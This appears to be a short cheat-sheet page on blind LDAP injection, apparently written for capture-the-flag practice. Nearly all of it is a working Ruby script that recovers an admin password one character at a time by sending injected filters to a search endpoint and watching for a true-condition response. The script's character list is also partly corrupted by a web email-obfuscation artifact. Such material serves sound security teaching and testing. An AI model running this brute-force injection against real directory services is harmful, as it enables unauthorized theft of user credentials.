LDAP injection
The is a very basic script that will retrieve the password of a user in a Blind LDAP Injection case by bruteforcing all characters one by one.
1
#!/usr/bin/env ruby
2
require 'net/http'
3
alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '[email protected]{}-/()!"$%=^[]:;'.split('')
4
flag = ''
5
(0..50).each do |i|
6
puts("[i] Looking for number #{i}")
7
alphabet.each do |char|
8
r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}"))
9
if /TRUE CONDITION/.match?(r)
10
flag += char
11
puts("[+] Flag: #{flag}")
12
break
13
end
14
end
15
end
Copied!
Copy link